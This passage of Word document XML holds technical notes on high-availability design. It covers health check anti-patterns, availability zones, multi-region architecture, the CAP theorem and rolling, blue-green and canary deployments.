          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Health Check Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F18BF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checking non-critical dependencies in the health endpoint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Your service shouldn't report unhealthy because a logging service is down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15356D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Heavy computation in health checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> A health check that runs queries or aggregations can itself become a performance problem under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF4880" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Missing timeouts in health checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Your health check calls the DB with no timeout. DB is slow. Health check hangs. LB's health check times out. Node marked unhealthy. Self-inflicted outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717D2F4A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="73599170">
          <v:rect id="_x0000_i1696" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C0D16" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Multi-Region / Multi-AZ Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DEF1B7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Availability Zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EBC277" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What they are physically:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Separate data centers within the same metro region, connected by low-latency (&lt; 2ms) fiber. Independent power, cooling, networking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278FFF90" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why they exist:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Protects against single data center failures (power outage, cooling failure, localized natural disaster) while maintaining low enough latency for synchronous replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4BF0DB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes of an AZ failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E63EE95" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When an AZ fails in AWS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4889E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>ELB health checks detect unhealthy instances (5–30s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA01F8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Traffic is routed only to healthy AZs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA6881" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Auto Scaling launches replacement instances in healthy AZs (minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7D56E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>RDS Multi-AZ performs database failover (60–120s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083E27D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Total recovery: 1–5 minutes depending on architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E947CE6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Multi-Region Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118852D5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's hard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE6F99" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Cross-region latency is 50–200ms. Synchronous replication becomes impractical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C1F98" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> You're forced into eventual consistency or you accept high write latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C04C9FC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conflict resolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> With active-active across regions, concurrent conflicting writes are guaranteed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC5921F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Running full infrastructure in multiple regions roughly doubles your bill.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83BDB2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Deployments, monitoring, debugging all become harder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65116167" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2A37A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Passive (DR):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> One region serves traffic. The other is a warm standby. Data replicates asynchronously. Failover is manual or semi-automated (minutes to hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D67136" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active (read):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> All regions serve reads from local replicas. Writes go to a single primary region. Read availability is excellent. Write availability is limited to one region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C2020D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active (full):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> All regions accept reads AND writes. Requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D599F9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Conflict resolution strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788092A3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Global request routing (GeoDNS, anycast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7786655B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Cross-region replication with conflict detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB54DB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Careful data modeling (e.g., region-sharding users so most writes are local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54235F0D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> DynamoDB Global Tables — active-active multi-region. Uses last-writer-wins conflict resolution. Replication lag is typically &lt; 1 second. Each region can independently serve reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C025B8C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="4E2D75D0">
          <v:rect id="_x0000_i1697" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="317F044B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. The CAP Theorem and Its Availability Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D48397" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The theorem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> In the presence of a network partition (P), a distributed system must choose between Consistency (C) and Availability (A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C92999" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What this means practically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774DA23A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When the network between your two data centers breaks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78558E7E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choose CP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Refuse to serve requests if you can't confirm consistency with the other partition. System becomes unavailable to some/all users. (Example: HBase, MongoDB in certain configurations, ZooKeeper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054868B2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choose AP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Continue serving requests in both partitions independently. When the partition heals, reconcile conflicts. (Example: Cassandra, DynamoDB, CouchDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E51DF3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The nuance most people miss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAD058" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>CAP applies </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>during</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> a partition. When there's no partition, you can have both C and A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D76402" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>The choice isn't binary — you can choose CP for some operations (money transfers) and AP for others (profile views) within the same system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402488BB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Modern systems often frame this as PACELC: during Partition → choose A or C; Else (normal operation) → choose Latency or Consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E3CFB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="410D9DC8">
          <v:rect id="_x0000_i1698" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55965B39" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Deployment Strategies for Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04368515" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Rolling Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C3545" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Update instances one (or a few) at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B46C37" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>At any moment, some instances run old version, some new.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A82CC8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If the new version is broken, only a fraction of traffic is affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAD457" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Capacity temporarily reduced (by the batch size being updated). If batch is 1 out of 10, you're at 90% capacity during rollout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340E5BA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Blue-Green Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9B50F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Two identical environments: Blue (current), Green (new).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63EBE6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Deploy to Green. Test it. Switch traffic from Blue to Green.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DB33D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If problems, switch back to Blue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B21F73" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Near-zero downtime. Switchover is a load balancer or DNS change. Rollback is instant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D5504" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Database schema changes. If Green needs a new schema, you can't just switch back to Blue without data loss/incompatibility. Requires forward-compatible schema migrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38637D47" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Canary Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9EC53" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Route a small percentage of traffic (1–5%) to the new version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C1CB1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Monitor error rates, latency, business metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065ABC2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If healthy, gradually increase percentage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B1C41" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If unhealthy, route 100% back to the old version.</w:t>
